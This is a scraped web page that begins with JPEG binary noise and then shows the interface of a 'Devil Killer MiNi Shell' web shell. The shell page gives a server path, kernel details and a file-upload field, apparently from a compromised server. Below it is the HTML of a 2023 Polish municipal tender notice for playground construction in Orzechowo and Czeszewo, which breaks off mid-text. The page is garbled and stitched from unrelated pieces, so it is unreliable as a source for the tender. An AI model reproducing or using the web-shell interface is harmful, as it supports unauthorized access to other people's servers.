JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20230718/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20230718/0031331301-N-2023.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Budowa miejsca rekreacji wraz z placem zabaw w miejscowości Orzechowo oraz modernizacja placu zabaw w miejscowości Czeszewo </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">GMINA MIŁOSŁAW</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 631258106</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Wrzesińska 19</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Miłosław</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">62-320</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">wielkopolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL414 - Koniński</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">sekretariat@miloslaw.info.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://miloslaw.bip.net.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Budowa miejsca rekreacji wraz z placem zabaw w miejscowości Orzechowo oraz modernizacja placu zabaw w miejscowości Czeszewo </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-25046929-2563-11ee-9aa3-96d3b4440790</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2023/BZP 00313313</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2023-07-18</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2023/BZP 00027103/03/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.7 Budowa miejsc rekreacji wraz z placem zabaw w miejscowości Orzechowo oraz modernizacja placu zabaw w miejscowości Czeszewo</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.15.) Nazwa projektu lub programu</h3> <p class="mb-0"> Środki z Europejskiego Funduszu Rolnego na rzecz Rozwoju Obszarów Wiejskich w ramach Programu Rozwoju Obszarów Wiejskich na lata 2014 – 2020 uzyskane w wyniku zawarcia umowy o przyznaniu pomocy NR 02366-6935-UM1513849/22 z dnia 26 stycznia 2023 r </p> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-25046929-2563-11ee-9aa3-96d3b4440790 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-cac6f820-cef5-11ed-b70f-ae2d9e28ec7b<br/><br/>Postępowanie prowadzone jest w języku polskim.<br/>W szczególnie uzasadnionych przypadkach uniemożliwiających komunikację wykonawcy i Zamawiającego za pośrednictwem<br/>Platformy e-Zamówienia, Zamawiający dopuszcza komunikację za pomocą poczty elektronicznej na adres e-mail:<br/>sekretariat@amsm-consulting.pl (nie dotyczy składania ofert/wniosków o dopuszczenie do udziału w postępowaniu).<br/>Zamawiający wyznacza następujące osoby do kontaktu z Wykonawcami:<br/>- w zakresie proceduralnym: Maksymilian Nagalski, e-mail: sekretariat@amsm-consulting.pl; tel. 734 497 093;<br/>- w zakresie merytorycznym: Anna Kubisiak, adres e-mail: akubisiak@miloslaw.info.pl, nr tel.: 61 438-37-27</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">: 1. Wykonawca musi posiadać konto<br/>podmiotu „Wykonawca” na Platformie e-Zamówienia.<br/>2. Przeglądanie i pobieranie publicznej treści dokumentacji postępowania nie wymaga posiadania konta na Platformie e Zamówienia<br/>ani logowania.<br/>3. Sposób sporządzenia dokumentów elektronicznych lub dokumentów elektronicznych będących kopią elektroniczną treści<br/>zapisanej w postaci papierowej (cyfrowe odwzorowania) musi być zgodny z wymaganiami określonymi w rozporządzeniu Prezesa<br/>Rady Ministrów z dnia 30 grudnia 2020 r. w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych<br/>dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub<br/>konkursie<br/>4. Dokumenty elektroniczne, o których mowa w § 2 ust. 1 rozporządzenia Prezesa Rady Ministrów Prezesa Rady Ministrów z dnia 30<br/>grudnia 2020 r. w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla dokumentów<br/>elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub konkursie, w<br/>formatach danych określonych w przepisach rozporządzenia Rady Ministrów z dnia 12 kwietnia 2012 r. w sprawie Krajowych Ram<br/>Interoperacyjności, minimalnych wymagań dla rejestrów publicznych i wymiany informacji w postaci elektronicznej oraz minimalnych<br/>wymagań dla systemów teleinformatycznych, z uwzględnieniem rodzaju przekazywanych danych i przekazuje się jako załączniki. W<br/>przypadku formatów, o których mowa w art. 66 ust. 1 ustawy Pzp, ww. regulacje nie będą miały bezpośredniego zastosowania.<br/>8. Informacje, oświadczenia lub dokumenty, inne niż wymienione w § 2 ust. 1 rozporządzenia Prezesa Rady Ministrów z dnia 30<br/>grudnia 2020 r. w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla dokumentów<br/>elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub konkursie,<br/>przekazywane w postępowaniu sporządza się w postaci elektronicznej:<br/>8.1.w formatach danych określonych w przepisach rozporządzenia Rady Ministrów z dnia 12 kwietnia 2012 r. w sprawie Krajowych<br/>Ram Interoperacyjności, minimalnych wymagań dla rejestrów publicznych i wymiany informacji w postaci elektronicznej oraz<br/>minimalnych wymagań dla systemów teleinformatycznych (i przekazuje się jako załącznik), lub<br/>8.2. jako tekst wpisany bezpośrednio do wiadomości przekazywanej przy użyciu środków komunikacji elektronicznej (np. w treści<br/>wiadomości e-mail lub w treści „Formularza do komunikacji”)<br/>9.Jeżeli dokumenty elektroniczne, przekazywane przy użyciu środków komunikacji elektronicznej, zawierają informacje stanowiące<br/>tajemnicę przedsiębiorstwa w rozumieniu przepisów ustawy z dnia 16 kwietnia 1993 r. o zwalczaniu nieuczciwej konkurencji<br/>wykonawca, w celu utrzymania w poufności tych informacji, przekazuje je w wydzielonym i odpowiednio oznaczonym pliku, wraz z<br/>jednoczesnym zaznaczeniem w nazwie pliku „Dokument stanowiący tajemnicę przedsiębiorstwa”.<br/>10. Minimalne wymagania techniczne dotyczące sprzętu używanego w celu korzystania z usług Platformy e-Zamówienia oraz<br/>informacje dotyczące specyfikacji połączenia określa Regulamin Platformy e-Zamówienia<br/>11. W przypadku problemów technicznych i awarii związanych z funkcjonowaniem Platformy e-Zamówienia użytkownicy mogą<br/>skorzystać ze wsparcia technicznego dostępnego pod numerem telefonu (32) 77 88 999 lub drogą elektroniczną poprzez formularz<br/>udostępniony na stronie internetowej https://ezamowienia.gov.pl w zakładce „Zgłoś problem”.<br/>Wymagania techniczne i organizacyjne opisane zostały szczegółowo w Rozdziale I podrozdziale 5 SWZ I - Instrukcja dla<br/>Wykonawców (IDW).</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust.1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE)<br/>2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie<br/>swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE<br/>L 119 z 04.05.2016, str. 1), dalej „RODO&#34;, informuję, że:<br/>• Administratorem Pani/Pana danych osobowych jest Gmina Miłosław, ul. Wrzesińska 19, 62-320 Miłosław, tel. 61 438 20 21, fax 61<br/>438 30 51, Poczta elektroniczna: sekretariat@miloslaw.info.pl<br/>• Administrator wyznaczył Inspektora Danych Osobowych: Piotr Majchrzak, z którym można się kontaktować pod adresem e-mail:<br/>iod@amsm-consulting.pl<br/>• Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu realizacji obowiązków nałożonych na<br/>administratora i wykonania zadania realizowanego w interesie publicznym, które są związane z prowadzonym postępowaniem o<br/>udzielenie zamówienia publicznego na „Budowa miejsca rekreacji wraz z placem zabaw w miejscowości Orzechowo oraz<br/>modernizacja placu zabaw w miejscowości Czeszewo &#34;, RK.271.ZP.6.2023 prowadzonym w trybie podstawowym bez negocjacji;<br/>oraz na podstawie art. 6 ust. 1 lit. f) w celach wynikających z prawnie uzasadnionych interesów realizowanych przez administratora<br/>lub przez stronę trzecią, którymi to interesami pozostają w szczególności dochodzenie ewentualnych roszczeń lub ochrona przed<br/>ewentualnymi roszczeniami, a także w celu wykazania zrealizowania ciążących na administratorze obowiązków prawnych.<br/>Administrator nie będzie przetwarzać danych w oparciu o art. 6 ust. 1 lit. f RODO działając jako organ publiczny w ramach realizacji<br/>swoich zadań.<br/>• Odbiorcami Pani/Pana danych osobowych mogą być:<br/>1. organy władzy publicznej oraz podmioty wykonujące zadania publiczne lub działające na zlecenie organów władzy publicznej lub<br/>inne jednostki lub osoby, w zakresie i w celach, które wynikają z przepisów powszechnie obowiązującego prawa, w tym sądy,<br/>prokuratury, urzędy skarbowe, komornicy sądowi,<br/>2. inne podmioty, które na podstawie stosownych umów podpisanych z Administratorem przetwarzają dane osobowe, w<br/>szczególności podmioty świadczące usługi doradztwa prawnego, operatorzy pocztowi, podmioty świadczący usługi informatyczne w<br/>tym dostawcy oprogramowania,<br/>3. osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. art. 18 PZP oraz art. 74 - 76 PZP,<br/>4. osoby upoważnione do przetwarzania danych przez Administratora,<br/>5. osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o obowiązujące przepisy prawa – w<br/>szczególności Ustawy z dnia 6 września 2001 r. o dostępie do informacji publicznej (t.j. Dz. U. z 2020 r. poz. 2176 z późn. zm.).<br/>• Dane osobowe nie będą przekazywane do państwa trzeciego/organizacji międzynarodowej.<br/>• Pani/Pana dane osobowe przetwarzane będą w związku z przepisami ustawy z dnia 27 sierpnia 2009 r. o finansach publicznych<br/>(t.j. Dz. U. z 2021 r. poz. 305 z późn. zm.), w celu związanym z postępowaniem o udzielenie zamówienia publicznego prowadzonym<br/>zgodnie z art. 4 pkt 8) ustawy z dnia 11 września 2019 r. Prawo zamówień publicznych (t.j. Dz.U. z 2021 r. poz. 1129 ze zm.), oraz<br/>dochodzenia ewentualnych roszczeń lub obrony przed ewentualnymi roszczeniami,.<br/>• Dane osobowe będą przetwarzane przez czas prowadzonego postępowania o udzielenie zamówienia publicznego, po tym czasie<br/>Pani/Pana dane osobowe przetwarzane będą przez okres przedawnienia roszczeń oraz w celach określonych ustawą Prawo<br/>zamówień publicznych przez 4 lata oraz ustawą z dnia 14 lipca 1983 r. o narodowym zasobie archiwalnym i archiwach (t.j. Dz. U. z<br/>2020 r., poz. 164 ze zm.).<br/>• W odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosowanie do art.<br/>22 RODO, w tym dane osobowe nie będą profilowane.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">: RODO c.d.<br/>• Posiada Pani/Pan:<br/>na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących,<br/>na podstawie art. 16 RODO prawo do sprostowania (poprawiania) Pani/Pana danych osobowych,<br/>na podstawie art. 17 RODO prawo do żądania usunięcia danych osobowych (tzw. prawo do bycia zapomnianym),<br/>na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych,<br/>na podstawie art. 20 RODO prawo do przenoszenia danych,<br/>na podstawie art. 21 RODO prawo sprzeciwu wobec przetwarzania danych.<br/>prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych (Biuro Prezesa Urzędu Ochrony Danych Osobowych<br/>(PUODO), ul. Stawki 2, 00-193 Warszawa), gdy uzna Pani/Pan, że przetwarzanie danych osobowych Pani/Pana dotyczących<br/>narusza przepisy RODO.<br/>Z uwagi na fakt, iż dane osobowe przetwarzane będą w różnych wskazanych powyżej celach przedstawione uprawnienia mogą być<br/>ograniczone lub mogą nie przysługiwać w zakresie wskazanym w RODO.<br/>Podanie przez Panią/Pana danych osobowych w zakresie prowadzonego postępowania o udzielenie zamówienia publicznego jest<br/>wymogiem ustawowym określonym w przepisach ustawy z dnia 11 września 2019 r. Prawo zamówień publicznych (t.j. Dz.U. z 2021<br/>r. poz. 1129 ze zm.), związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje niepodania<br/>określonych danych wynikają z wskazanej ustawy i skutkować będą w szczególności niemożliwością uczestnictwa w postępowaniu<br/>związanym z udzieleniem zamówienia publicznego.<br/>W sytuacji gdy Administrator pozyskał dane osobowe nie bezpośrednio od Pani/Pana wskazuje, że:<br/>a. Dane osobowe zostały przekazane administratorowi przez podmiot z którym zawarto umowę lub w przypadku gdy może to mieć zastosowanie dane osobowe pochodzą ze źródeł powszechnie dostępnych w postaci Krajowego Rejestru Sądowego lub Centralnej<br/>Ewidencji i Informacji o Działalności Gospodarczej,<br/>b. Przetwarzane będą następujące kategorie Pani/Pana danych osobowych: imię, nazwisko, stanowisko, numer telefonu, adres<br/>email, inne niezbędne dane osobowe przekazane administratorowi przez podmiot pozostający stroną umowy, które to dane<br/>pozostają niezbędne do wykonania umowy (o ile zostały podane).</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">RK.271.ZP.14.2023</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">2</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.1	Przedmiot zamówienia obejmuje:<br/><br/><br/>Zamówienie dotyczy zadania inwestycyjnego pn. „Budowa miejsca rekreacji wraz z placem zabaw w miejscowości Orzechowo oraz modernizacja placu zabaw w miejscowości Czeszewo” w tym wykonania wszystkich prac prowadzących do osiągniecia stanu zgodnego z dokumentacją projektową, specyfikacjami technicznymi wykonania i odbioru robót budowlanych oraz SWZ.<br/><br/>Realizacja zadania podzielona została na części:<br/><br/>CZĘŚĆ I - Budowa miejsca rekreacji wraz z placem zabaw w miejscowości Orzechowo obejmuje budowę miejsca rekreacji wraz z placem zabaw w miejscowości Orzechowo na działce gruntu o nr ew. 839 w tym wykonanie prac obejmujących:<br/>•	Roboty ziemne i betonowe<br/>•	Ogrodzenie placu zabaw<br/>•	Dostawę i montaż urządzeń placu zabaw<br/>•	Dostawę i montaż miejsca rekreacji<br/><br/>Szczegółowy opis przedmiotu zamówienia znajduje się w części III SWZ:<br/>SWZ III – Przedmiar – CZĘŚĆ I<br/>SWZ III – Szczegółowy opis przedmiotu zamówienia – CZĘŚĆ I<br/><br/>CZĘŚĆ II - Modernizacja placu zabaw w miejscowości Czeszewo obejmuje modernizację placu zabaw w miejscowości Czeszewo na działce gruntu o nr ew. 202 w tym wykonanie prac obejmujących:<br/>•	Roboty ziemne i betonowe<br/>•	Dostawę i montaż urządzeń placu zabaw<br/><br/>Szczegółowy opis przedmiotu zamówienia znajduje się w części III SWZ:<br/>SWZ III – Przedmiar – CZĘŚĆ II<br/>SWZ III – Szczegółowy opis przedmiotu zamówienia – CZĘŚĆ II<br/><br/><br/>Zamawiający dopuszcza składanie ofert częściowych. Ofertę można złożyć w odniesieniu do jednej, kilku lub wszystkich części zamówienia.<br/>Wykonawca w składanej ofercie wyceni całość prac dotyczącą danej części osobno, wyszczególniając koszty pojedynczych elementów zamówienia. <br/>Zamawiający nie określa maksymalnej liczby części, na które może zostać udzielone zamówienie jednemu Wykonawcy.<br/><br/>UWAGA!<br/>W przypadku, gdy dokumentacja techniczna zawierać będzie nazwę producenta lub firmy, Zamawiający zastrzega możliwość zastosowania innych materiałów jednak <br/>o parametrach nie gorszych niż opisane w dokumentacji i przedmiarze. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45112723-9 - Roboty w zakresie kształtowania placów zabaw</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45112720-8 - Roboty w zakresie kształtowania terenów sportowych i rekreacyjnych</p> <p class="mb-0">37535200-9 - Wyposażenie placów zabaw</p> <p class="mb-0">37410000-5 - Sprzęt sportowy do uprawiania sportów na wolnym powietrzu</p> <p class="mb-0">43325000-7 - Wyposażenie parków i placów zabaw</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">49 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy wyborze najkorzystniejszej ofert Zamawiający będzie się kierował kryterium oceny ofert:<br/>1) Cena<br/>2) Okres gwarancji i rękojmi</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji i rękojmi</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.1	Przedmiot zamówienia obejmuje:<br/><br/><br/>Zamówienie dotyczy zadania inwestycyjnego pn. „Budowa miejsca rekreacji wraz z placem zabaw w miejscowości Orzechowo oraz modernizacja placu zabaw w miejscowości Czeszewo” w tym wykonania wszystkich prac prowadzących do osiągniecia stanu zgodnego z dokumentacją projektową, specyfikacjami technicznymi wykonania i odbioru robót budowlanych oraz SWZ.<br/><br/>Realizacja zadania podzielona została na części:<br/><br/>CZĘŚĆ I - Budowa miejsca rekreacji wraz z placem zabaw w miejscowości Orzechowo obejmuje budowę miejsca rekreacji wraz z placem zabaw w miejscowości Orzechowo na działce gruntu o nr ew. 839 w tym wykonanie prac obejmujących:<br/>•	Roboty ziemne i betonowe<br/>•	Ogrodzenie placu zabaw<br/>•	Dostawę i montaż urządzeń placu zabaw<br/>•	Dostawę i montaż miejsca rekreacji<br/><br/>Szczegółowy opis przedmiotu zamówienia znajduje się w części III SWZ:<br/>SWZ III – Przedmiar – CZĘŚĆ I<br/>SWZ III – Szczegółowy opis przedmiotu zamówienia – CZĘŚĆ I<br/><br/>CZĘŚĆ II 